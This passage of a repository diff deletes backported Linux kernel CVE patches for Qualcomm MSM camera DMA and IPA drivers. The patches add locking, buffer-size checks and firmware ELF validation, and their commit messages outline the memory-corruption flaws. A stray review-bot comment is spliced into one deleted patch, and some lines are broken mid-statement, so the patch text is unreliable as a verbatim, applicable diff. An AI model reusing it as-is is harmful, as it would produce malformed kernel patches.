- .../platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h | 1 +
- 2 files changed, 12 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c
-index 3301fc4..4b48469 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c
-@@ -537,6 +537,7 @@ static int msm_jpegdma_open(struct file *file)
- if (!ctx)
- return -ENOMEM;
-
-+ mutex_init(&ctx->lock);
- ctx->jdma_device = device;
- dev_dbg(ctx->jdma_device->dev, "Jpeg v4l2 dma open\n");
- /* Set ctx defaults */
-@@ -835,12 +836,13 @@ static int msm_jpegdma_qbuf(struct file *file, void *fh,
- int ret;
-
- msm_jpegdma_cast_long_to_buff_ptr(buf->m.userptr, &up_buff);
--
-+ mutex_lock(&ctx->lock);
- if (!access_ok(VERIFY_READ, up_buff,
- sizeof(struct msm_jpeg_dma_buff)) ||
- get_user(kp_buff.fd, &up_buff->fd) ||
- get_user(kp_buff.offset, &up_buff->offset)) {
- dev_err(ctx->jdma_device->dev, "Error getting user data\n");
-+ mutex_unlock(&ctx->lock);
- return -EFAULT;
- }
-
-@@ -849,6 +851,7 @@ static int msm_jpegdma_qbuf(struct file *file, void *fh,
- put_user(kp_buff.fd, &up_buff->fd) ||
- put_user(kp_buff.offset, &up_buff->offset)) {
- dev_err(ctx->jdma_device->dev, "Error putting user data\n");
-+ mutex_unlock(&ctx->lock);
- return -EFAULT;
- }
-
-@@ -871,7 +874,7 @@ static int msm_jpegdma_qbuf(struct file *file, void *fh,
- ret = v4l2_m2m_qbuf(file, ctx->m2m_ctx, buf);
- if (ret < 0)
- dev_err(ctx->jdma_device->dev, "QBuf fail\n");
--
-+ mutex_unlock(&ctx->lock);
- return ret;
- }
-
-@@ -1032,10 +1035,11 @@ static int msm_jpegdma_s_crop(struct file *file, void *fh,
- if (crop->c.height % formats[ctx->format_idx].v_align)
- return -EINVAL;
-
-+ mutex_lock(&ctx->lock);
- ctx->crop = crop->c;
- if (atomic_read(&ctx->active))
- ret = msm_jpegdma_update_hw_config(ctx);
--
-+ mutex_unlock(&ctx->lock);
- return ret;
- }
-
-@@ -1240,12 +1244,14 @@ void msm_jpegdma_isr_processing_done(struct msm_jpegdma_device *dma)
-
- ctx = v4l2_m2m_get_curr_priv(dma->m2m_dev);
- if (ctx) {
-+ mutex_lock(&ctx->lock);
- ctx->plane_idx++;
- if (ctx->plane_idx >= formats[ctx->format_idx].num_planes) {
- src_buf = v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
- dst_buf = v4l2_m2m_dst_buf_remove(ctx->m2m_ctx);
- if (src_buf == NULL || dst_buf == NULL) {
- dev_err(ctx->jdma_device->dev, "Error, buffer list empty\n");
-+ mutex_unlock(&ctx->lock);
- mutex_unlock(&dma->lock);
- return;
- }
-@@ -1261,11 +1267,13 @@ void msm_jpegdma_isr_processing_done(struct msm_jpegdma_device *dma)
- src_buf = v4l2_m2m_next_src_buf(ctx->m2m_ctx);
- if (src_buf == NULL || dst_buf == NULL) {
- dev_err(ctx->jdma_device->dev, "Error, buffer list empty\n");
-+ mutex_unlock(&ctx->lock);
- mutex_unlock(&dma->lock);
- return;
- }
- msm_jpegdma_process_buffers(ctx, src_buf, dst_buf);
- }
-+ mutex_unlock(&ctx->lock);
- }
- mutex_unlock(&dma->lock);
- }
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h
-index 6a1205d..4911ce3 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h
-@@ -254,6 +254,7 @@ struct msm_jpegdma_buf_handle {
- * @format_idx: Current format index.
- */
- struct jpegdma_ctx {
-+ struct mutex lock;
- struct msm_jpegdma_device *jdma_device;
- atomic_t active;
- struct completion completion;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8236/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8236/3.10/0001.patch
deleted file mode 100644
index 02c0d5af..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8236/3.10/0001.patch
+++ /dev/null
@@ -1,81 +0,0 @@
-From 8a079632f447be9fd86f92b8e02b1940a26c8a2a Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Wed, 1 Mar 2017 16:08:27 -0800
-Subject: msm: IPA: add the check on intf query
-
-The ipa_ioc_query_intf_rx_props structure comes
-from the ioctl handler, and it is verified that
-the size of rx buffer does not exceed the
-IPA_NUM_PROPS_MAX elements. It is also verified
-that the "entry->rx" buffer does not exceed
-IPA_NUM_PROPS_MAX when "entry" is allocated.
-However, the sizes of the buffer "rx->rx" and
-the buffer "entry->rx" are not guaranteed to
-be the same and will lead memory corruption
-issue. The fix is to add the check before
-memcpy.
-
-Change-Id: Idf5c2d32f47c1a1cffeaa5607193855188893ddb
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/ipa/ipa_intf.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_intf.c b/drivers/platform/msm/ipa/ipa_intf.c
-index 9a74107..18924a7 100644
---- a/drivers/platform/msm/ipa/ipa_intf.c
-+++ b/drivers/platform/msm/ipa/ipa_intf.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -275,6 +275,14 @@ int ipa_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- mutex_lock(&ipa_ctx->lock);
- list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- if (!strncmp(entry->name, tx->name, IPA_RESOURCE_NAME_MAX)) {
-+ /* add the entry check */
-+ if (entry->num_tx_props != tx->num_tx_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_tx_props,
-+ tx->num_tx_props);
-+ mutex_unlock(&ipa_ctx->lock);
-+ return result;
-+ }
- memcpy(tx->tx, entry->tx, entry->num_tx_props *
- sizeof(struct ipa_ioc_tx_intf_prop));
- result = 0;
-@@ -308,6 +316,14 @@ int ipa_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- mutex_lock(&ipa_ctx->lock);
- list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- if (!strncmp(entry->name, rx->name, IPA_RESOURCE_NAME_MAX)) {
-+ /* add the entry check */
-+ if (entry->num_rx_props != rx->num_rx_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_rx_props,
-+ rx->num_rx_props);
-+ mutex_unlock(&ipa_ctx->lock);
-+ return result;
-+ }
- memcpy(rx->rx, entry->rx, entry->num_rx_props *
- sizeof(struct ipa_ioc_rx_intf_prop));
- result = 0;
-@@ -341,6 +357,14 @@ int ipa_query_intf_ext_props(struct ipa_ioc_query_intf_ext_props *ext)
- mutex_lock(&ipa_ctx->lock);
- list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- if (!strcmp(entry->name, ext->name)) {
-+ /* add the entry check */
-+ if (entry->num_ext_props != ext->num_ext_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_ext_props,
-+ ext->num_ext_props);
-+ mutex_unlock(&ipa_ctx->lock);
-+ return result;
-+ }
- memcpy(ext->ext, entry->ext, entry->num_ext_props *
- sizeof(struct ipa_ioc_ext_intf_prop));
- result = 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8236/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8236/3.18/0002.patch
deleted file mode 100644
index 362151cd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8236/3.18/0002.patch
+++ /dev/null
@@ -1,147 +0,0 @@
-From cf0d31bc3b04cf2db7737d36b11a5bf50af0c1db Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Wed, 1 Mar 2017 16:08:27 -0800
-Subject: msm: IPA: add the check on intf query
-
-The ipa_ioc_query_intf_rx_props structure comes
-from the ioctl handler, and it is verified that
-the size of rx buffer does not exceed the
-IPA_NUM_PROPS_MAX elements. It is also verified
-that the "entry->rx" buffer does not exceed
-IPA_NUM_PROPS_MAX when "entry" is allocated.
-However, the sizes of the buffer "rx->rx" and
-the buffer "entry->rx" are not guaranteed to
-be the same and will lead memory corruption
-issue. The fix is to add the check before
-memcpy.
-
-Change-Id: Idf5c2d32f47c1a1cffeaa5607193855188893ddb
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/ipa/ipa_v2/ipa_intf.c | 24 ++++++++++++++++++++++++
- drivers/platform/msm/ipa/ipa_v3/ipa_intf.c | 28 +++++++++++++++++++++++++---
- 2 files changed, 49 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c b/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c
-index e0f4dcf..f8f8fd1 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c
-@@ -272,6 +272,14 @@ int ipa_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- mutex_lock(&ipa_ctx->lock);
- list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- if (!strncmp(entry->name, tx->name, IPA_RESOURCE_NAME_MAX)) {
-+ /* add the entry check */
-+ if (entry->num_tx_props != tx->num_tx_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_tx_props,
-+ tx->num_tx_props);
-+ mutex_unlock(&ipa_ctx->lock);
-+ return result;
-+ }
- memcpy(tx->tx, entry->tx, entry->num_tx_props *
- sizeof(struct ipa_ioc_tx_intf_prop));
- result = 0;
-@@ -305,6 +313,14 @@ int ipa_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- mutex_lock(&ipa_ctx->lock);
- list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- if (!strncmp(entry->name, rx->name,
IPA_RESOURCE_NAME_MAX)) {
-+ /* add the entry check */
-+ if (entry->num_rx_props != rx->num_rx_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_rx_props,
-+ rx->num_rx_props);
-+ mutex_unlock(&ipa_ctx->lock);
-+ return result;
-+ }
- memcpy(rx->rx, entry->rx, entry->num_rx_props *
- sizeof(struct ipa_ioc_rx_intf_prop));
- result = 0;
-@@ -338,6 +354,14 @@ int ipa_query_intf_ext_props(struct ipa_ioc_query_intf_ext_props *ext)
- mutex_lock(&ipa_ctx->lock);
- list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- if (!strcmp(entry->name, ext->name)) {
-+ /* add the entry check */
-+ if (entry->num_ext_props != ext->num_ext_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_ext_props,
-+ ext->num_ext_props);
-+ mutex_unlock(&ipa_ctx->lock);
-+ return result;
-+ }
- memcpy(ext->ext, entry->ext, entry->num_ext_props *
- sizeof(struct ipa_ioc_ext_intf_prop));
- result = 0;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c b/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c
-index b9f5755..067a58c 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -275,6 +275,14 @@ int ipa3_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- mutex_lock(&ipa3_ctx->lock);
- list_for_each_entry(entry, &ipa3_ctx->intf_list, link) {
- if (!strcmp(entry->name, tx->name)) {
-+ /* add the entry check */
-+ if (entry->num_tx_props != tx->num_tx_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_tx_props,
-+ tx->num_tx_props);
-+ mutex_unlock(&ipa3_ctx->lock);
-+ return result;
-+ }
- memcpy(tx->tx, entry->tx, entry->num_tx_props *
- sizeof(struct ipa_ioc_tx_intf_prop));
- result = 0;
-@@ -282,7 +290,6 @@ int ipa3_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- }
- }
- mutex_unlock(&ipa3_ctx->lock);
--
- return result;
- }
-
-@@ -314,6 +321,14 @@ int ipa3_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- mutex_lock(&ipa3_ctx->lock);
- list_for_each_entry(entry, &ipa3_ctx->intf_list, link) {
- if (!strcmp(entry->name, rx->name)) {
-+ /* add the entry check */
-+ if (entry->num_rx_props != rx->num_rx_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_rx_props,
-+ rx->num_rx_props);
-+ mutex_unlock(&ipa3_ctx->lock);
-+ return result;
-+ }
- memcpy(rx->rx, entry->rx, entry->num_rx_props *
- sizeof(struct ipa_ioc_rx_intf_prop));
- result = 0;
-@@ -321,7 +336,6 @@ int ipa3_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- }
- }
- mutex_unlock(&ipa3_ctx->lock);
--
- return result;
- }
-
-@@ -348,6 +362,14 @@ int ipa3_query_intf_ext_props(struct ipa_ioc_query_intf_ext_props *ext)
- mutex_lock(&ipa3_ctx->lock);
- list_for_each_entry(entry, &ipa3_ctx->intf_list, link) {
- if (!strcmp(entry->name, ext->name)) {
-+ /* add the entry check */
-+ if (entry->num_ext_props != ext->num_ext_props) {
-+ IPAERR("invalid entry number(%u %u)\n",
-+ entry->num_ext_props,
-+ ext->num_ext_props);
-+ mutex_unlock(&ipa3_ctx->lock);
-+
return result;
-+ }
- memcpy(ext->ext, entry->ext, entry->num_ext_props *
- sizeof(struct ipa_ioc_ext_intf_prop));
- result = 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8237/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8237/ANY/0001.patch
deleted file mode 100644
index 60568bde..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8237/ANY/0001.patch
+++ /dev/null
@@ -1,476 +0,0 @@
-From 342d16ac6fb01e304ec75344c693257e00628ecf Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi
-Date: Tue, 24 Jan 2017 15:42:30 +0200
-Subject: msm: ipa3: Validate IPA and GSI firmwares before loading
-
-IPA and GSI firmwares are saved on the file-system as an
-ELF file. IPA driver extracts the firmwares and load
-them during driver initialization.
-This change adds validation steps to each firmware before
-loading: load addresses, memory sizes, firmware sizes and
-more...
-
-Change-Id: I7d7f66e8e8a9ca0efae08b1e57b25ae4e44cc5bb
-CRs-fixed: 1110522
-Signed-off-by: Ghanim Fodi
----
- drivers/platform/msm/gsi/gsi.c | 10 ++
- drivers/platform/msm/gsi/gsi_reg.h | 4 +-
- drivers/platform/msm/ipa/ipa_v3/ipa.c | 2 +-
- drivers/platform/msm/ipa/ipa_v3/ipa_i.h | 2 +-
- drivers/platform/msm/ipa/ipa_v3/ipa_utils.c | 187 +++++++++++++++------
- drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c | 18 +-
- drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h | 12 +-
- drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h | 6 +-
- .../platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c | 6 +
- .../platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h | 4 +-
- include/linux/msm_gsi.h | 21 ++-
- 11 files changed, 215 insertions(+), 57 deletions(-)
-
-diff --git a/drivers/platform/msm/gsi/gsi.c b/drivers/platform/msm/gsi/gsi.c
-index 24fdd61..a30d806 100644
---- a/drivers/platform/msm/gsi/gsi.c
-+++ b/drivers/platform/msm/gsi/gsi.c
-@@ -2742,6 +2742,16 @@ int gsi_enable_fw(phys_addr_t gsi_base_addr, u32 gsi_size, enum gsi_ver ver)
- }
- EXPORT_SYMBOL(gsi_enable_fw);
-
-+void gsi_get_inst_ram_offset_and_size(unsigned long *base_offset,
-+ unsigned long *size)
-+{
-+ if (base_offset)
-+ *base_offset = GSI_GSI_INST_RAM_BASE_OFFS;
-+ if (size)
-+ *size = GSI_GSI_INST_RAM_SIZE;
-+}
-+EXPORT_SYMBOL(gsi_get_inst_ram_offset_and_size);
-+
- static int msm_gsi_probe(struct platform_device *pdev)
- {
- struct device *dev = &pdev->dev;
-diff --git a/drivers/platform/msm/gsi/gsi_reg.h
b/drivers/platform/msm/gsi/gsi_reg.h
-index fa1e848..1acaf74 100644
---- a/drivers/platform/msm/gsi/gsi_reg.h
-+++ b/drivers/platform/msm/gsi/gsi_reg.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1838,5 +1838,7 @@
- #define GSI_INTER_EE_n_SRC_EV_CH_IRQ_CLR_EV_CH_BIT_MAP_BMSK 0xffffffff
- #define GSI_INTER_EE_n_SRC_EV_CH_IRQ_CLR_EV_CH_BIT_MAP_SHFT 0x0
-
-+#define GSI_GSI_INST_RAM_BASE_OFFS 0x4000
-+#define GSI_GSI_INST_RAM_SIZE 0x4000
-
- #endif /* __GSI_REG_H__ */
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-index aa83cbd..82887d05 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-@@ -4187,7 +4187,7 @@ static int ipa3_trigger_fw_loading_mdms(void)
-
- IPADBG("FWs are available for loading\n");
-
-- result = ipa3_load_fws(fw);
-+ result = ipa3_load_fws(fw, ipa3_res.transport_mem_base);
- if (result) {
- IPAERR("IPA FWs loading has failed\n");
- release_firmware(fw);
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-index 3f19c21..fa6dd64 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-@@ -2015,7 +2015,7 @@ int ipa3_uc_panic_notifier(struct notifier_block *this,
- unsigned long event, void *ptr);
- void ipa3_inc_acquire_wakelock(void);
- void ipa3_dec_release_wakelock(void);
--int ipa3_load_fws(const struct firmware *firmware);
-+int ipa3_load_fws(const struct firmware *firmware, phys_addr_t gsi_mem_base);
- int ipa3_register_ipa_ready_cb(void (*ipa_ready_cb)(void *), void *user_data);
- const char *ipa_hw_error_str(enum ipa3_hw_errors err_type);
- int ipa_gsi_ch20_wa(void);
-diff --git
a/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c b/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c
-index 7b7ae75..ba255a2 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c
-@@ -6107,75 +6107,164 @@ int ipa3_generate_eq_from_hw_rule(
- return 0;
- }
-
-+static int ipa3_load_single_fw(const struct firmware *firmware,
-+ const struct elf32_phdr *phdr)
-+{
-+ uint32_t *fw_mem_base;
-+ int index;
-+ const uint32_t *elf_data_ptr;
-+
-+ if (phdr->p_offset > firmware->size) {
-+ IPAERR("Invalid ELF: offset=%u is beyond elf_size=%zu\n",
-+ phdr->p_offset, firmware->size);
-+ return -EINVAL;
-+ }
-+ if ((firmware->size - phdr->p_offset) < phdr->p_filesz) {
-+ IPAERR("Invalid ELF: offset=%u filesz=%u elf_size=%zu\n",
-+ phdr->p_offset, phdr->p_filesz, firmware->size);
-+ return -EINVAL;
-+ }
-+
-+ if (phdr->p_memsz % sizeof(uint32_t)) {
-+ IPAERR("FW mem size %u doesn't align to 32bit\n",
-+ phdr->p_memsz);
-+ return -EFAULT;
-+ }
-+
-+ if (phdr->p_filesz > phdr->p_memsz) {
-+ IPAERR("FW image too big src_size=%u dst_size=%u\n",
-+ phdr->p_filesz, phdr->p_memsz);
-+ return -EFAULT;
-+ }
-+
-+ fw_mem_base = ioremap(phdr->p_vaddr, phdr->p_memsz);
-+ if (!fw_mem_base) {
-+ IPAERR("Failed to map 0x%x for the size of %u\n",
-+ phdr->p_vaddr, phdr->p_memsz);
-+ return -ENOMEM;
-+ }
-+
-+ /* Set the entire region to 0s */
-+ memset(fw_mem_base, 0, phdr->p_memsz);
-+
-+ elf_data_ptr = (uint32_t *)(firmware->data + phdr->p_offset);
-+
-+ /* Write the FW */
-+ for (index = 0; index < phdr->p_filesz/sizeof(uint32_t); index++) {
-+ writel_relaxed(*elf_data_ptr, &fw_mem_base[index]);
-+ elf_data_ptr++;
-+ }
-+
-+ iounmap(fw_mem_base);
-+
-+ return 0;
-+}
-+
- /**
- * ipa3_load_fws() - Load the IPAv3 FWs into IPA&GSI SRAM.
- *
- * @firmware: Structure which contains the FW data from the user space.
-+ * @gsi_mem_base: GSI base address
- *
- * Return value: 0 on success, negative otherwise
- *
- */
--int ipa3_load_fws(const struct firmware *firmware)
-+int ipa3_load_fws(const struct firmware *firmware, phys_addr_t gsi_mem_base)
- {
- const struct elf32_hdr *ehdr;
- const struct elf32_phdr *phdr;
-- const uint8_t *elf_phdr_ptr;
-- uint32_t *elf_data_ptr;
-- int phdr_idx, index;
-- uint32_t *fw_mem_base;
--
-- ehdr = (struct elf32_hdr *) firmware->data;
--
-- elf_phdr_ptr = firmware->data + sizeof(*ehdr);
-+ unsigned long gsi_iram_ofst;
-+ unsigned long gsi_iram_size;
-+ phys_addr_t ipa_reg_mem_base;
-+ u32 ipa_reg_ofst;
-+ int rc;
-+
-+ if (!gsi_mem_base) {
-+ IPAERR("Invalid GSI base address\n");
-+ return -EINVAL;
-+ }
-
-- for (phdr_idx = 0; phdr_idx < ehdr->e_phnum; phdr_idx++) {
-- /*
-- * The ELF program header will contain the starting
-- * address to which the firmware needs to copied.
-- */
-- phdr = (struct elf32_phdr *)elf_phdr_ptr;
-+ ipa_assert_on(!firmware);
-+ /* One program header per FW image: GSI, DPS and HPS */
-+ if (firmware->size < (sizeof(*ehdr) + 3 * sizeof(*phdr))) {
-+ IPAERR("Missing ELF and Program headers firmware size=%zu\n",
-+ firmware->size);
-+ return -EINVAL;
-+ }
-
-- /*
-- * p_vaddr will contain the starting address to which the
-- * FW needs to be loaded.
-- * p_memsz will contain the size of the IRAM.
-- * p_filesz will contain the size of the FW image.
-- */
-- fw_mem_base = ioremap(phdr->p_vaddr, phdr->p_memsz);
-- if (!fw_mem_base) {
-- IPAERR("Failed to map 0x%x for the size of %u\n",
-- phdr->p_vaddr, phdr->p_memsz);
-- return -ENOMEM;
-- }
-+ ehdr = (struct elf32_hdr *) firmware->data;
-+ ipa_assert_on(!ehdr);
-+ if (ehdr->e_phnum != 3) {
-+ IPAERR("Unexpected number of ELF program headers\n");
-+ return -EINVAL;
-+ }
-+ phdr = (struct elf32_phdr *)(firmware->data + sizeof(*ehdr));
-
-- /* Set the entire region to 0s */
-- memset(fw_mem_base, 0, phdr->p_memsz);
-+ /*
-+ * Each ELF program header represents a FW image and contains:
-+ * p_vaddr : The starting address to which the FW needs to loaded.
-+ * p_memsz : The size of the IRAM (where the image loaded)
-+ * p_filesz: The size of the FW image embedded inside the ELF
-+ * p_offset: Absolute offset to the image from the head of the ELF
-+ */
-
-- /*
-- * p_offset will contain and absolute offset from the beginning
-- * of the ELF file.
-- */
-- elf_data_ptr = (uint32_t *)
-- ((uint8_t *)firmware->data + phdr->p_offset);
-+ /* Load GSI FW image */
-+ gsi_get_inst_ram_offset_and_size(&gsi_iram_ofst, &gsi_iram_size);
-+ if (phdr->p_vaddr != (gsi_mem_base + gsi_iram_ofst)) {
-+ IPAERR(
-+ "Invalid GSI FW img load addr vaddr=0x%x gsi_mem_base=%pa gsi_iram_ofst=0x%lx\n"
-+ , phdr->p_vaddr, &gsi_mem_base, gsi_iram_ofst);
-+ return -EINVAL;
-+ }
-+ if (phdr->p_memsz > gsi_iram_size) {
-+ IPAERR("Invalid GSI FW img size memsz=%d gsi_iram_size=%lu\n",
-+ phdr->p_memsz, gsi_iram_size);
-+ return -EINVAL;
-+ }
-+ rc = ipa3_load_single_fw(firmware, phdr);
-+ if (rc)
-+ return rc;
-
-- if (phdr->p_memsz % sizeof(uint32_t)) {
-- IPAERR("FW size %u doesn't align to 32bit\n",
-- phdr->p_memsz);
-- return -EFAULT;
-- }
-+ phdr++;
-+ ipa_reg_mem_base = ipa3_ctx->ipa_wrapper_base + ipahal_get_reg_base();
-
-- /* Write the FW */
-- for (index = 0; index < phdr->p_filesz/sizeof(uint32_t);
-- index++) {
-- writel_relaxed(*elf_data_ptr, &fw_mem_base[index]);
-- elf_data_ptr++;
-- }
-+ /* Load IPA DPS FW image */
-+ ipa_reg_ofst = ipahal_get_reg_ofst(IPA_DPS_SEQUENCER_FIRST);
-+ if (phdr->p_vaddr != (ipa_reg_mem_base + ipa_reg_ofst)) {
-+ IPAERR(
-+ "Invalid IPA DPS img load addr vaddr=0x%x ipa_reg_mem_base=%pa ipa_reg_ofst=%u\n"
-+ , phdr->p_vaddr, &ipa_reg_mem_base, ipa_reg_ofst);
-+ return -EINVAL;
-+ }
-+ if (phdr->p_memsz > ipahal_get_dps_img_mem_size()) {
-+ IPAERR("Invalid IPA DPS img size memsz=%d dps_mem_size=%u\n",
-+ phdr->p_memsz, ipahal_get_dps_img_mem_size());
-+ return -EINVAL;
-+ }
-+ rc = ipa3_load_single_fw(firmware, phdr);
-+ if (rc)
-+ return rc;
-
-- iounmap(fw_mem_base);
-+ phdr++;
-
-- elf_phdr_ptr = elf_phdr_ptr + sizeof(*phdr);
-+ /* Load IPA HPS FW image */
-+ ipa_reg_ofst = ipahal_get_reg_ofst(IPA_HPS_SEQUENCER_FIRST);
-+ if (phdr->p_vaddr != (ipa_reg_mem_base + ipa_reg_ofst)) {
-+ IPAERR(
-+ "Invalid IPA HPS img load addr vaddr=0x%x ipa_reg_mem_base=%pa ipa_reg_ofst=%u\n"
-+ , phdr->p_vaddr, &ipa_reg_mem_base, ipa_reg_ofst);
-+ return -EINVAL;
-+ }
-+ if (phdr->p_memsz > ipahal_get_hps_img_mem_size()) {
-+ IPAERR("Invalid IPA HPS img size memsz=%d dps_mem_size=%u\n",
-+ phdr->p_memsz, ipahal_get_hps_img_mem_size());
-+ return -EINVAL;
- }
-- IPADBG("IPA FWs (GSI FW, HPS and DPS) were loaded\n");
-+ rc = ipa3_load_single_fw(firmware, phdr);
-+ if (rc)
-+ return rc;
-+
-+ IPADBG("IPA FWs (GSI FW, DPS and HPS) loaded successfully\n");
- return 0;
- }
-
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c
-index d023522..95a97ed 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
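Review bot: In ipa3_load_single_fw (ipa_utils.c) the mapping returned by ioremap() is held in a plain `uint32_t *` and zeroed with `memset(fw_mem_base, 0, phdr->p_memsz)`, while the copy loop right after it goes through writel_relaxed(). The memset is carried over from the loop this patch removes rather than introduced by it, but with the function being rewritten the pointer is better declared as `uint32_t __iomem *fw_mem_base;` and the region cleared with `memset_io(fw_mem_base, 0, phdr->p_memsz);`, so the mapped SRAM is only touched through the I/O accessors. Separately, the HPS size check in ipa3_load_fws logs the value of ipahal_get_hps_img_mem_size() under the label `dps_mem_size=%u`; it should read `hps_mem_size=%u` so a rejected image is attributed to the right limit.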
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1253,6 +1253,22 @@ int ipahal_get_proc_ctx_needed_len(enum ipa_hdr_proc_type type)
- return res;
- }
-
-+/*
-+ * Get IPA Data Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_dps_img_mem_size(void)
-+{
-+ return IPA_HW_DPS_IMG_MEM_SIZE_V3_0;
-+}
-+
-+/*
-+ * Get IPA Header Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_hps_img_mem_size(void)
-+{
-+ return IPA_HW_HPS_IMG_MEM_SIZE_V3_0;
-+}
-+
- int ipahal_init(enum ipa_hw_type ipa_hw_type, void __iomem *base)
- {
- int result;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h
-index 00b2058..746bc30 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h
-@@ -1,4 +1,4 @@
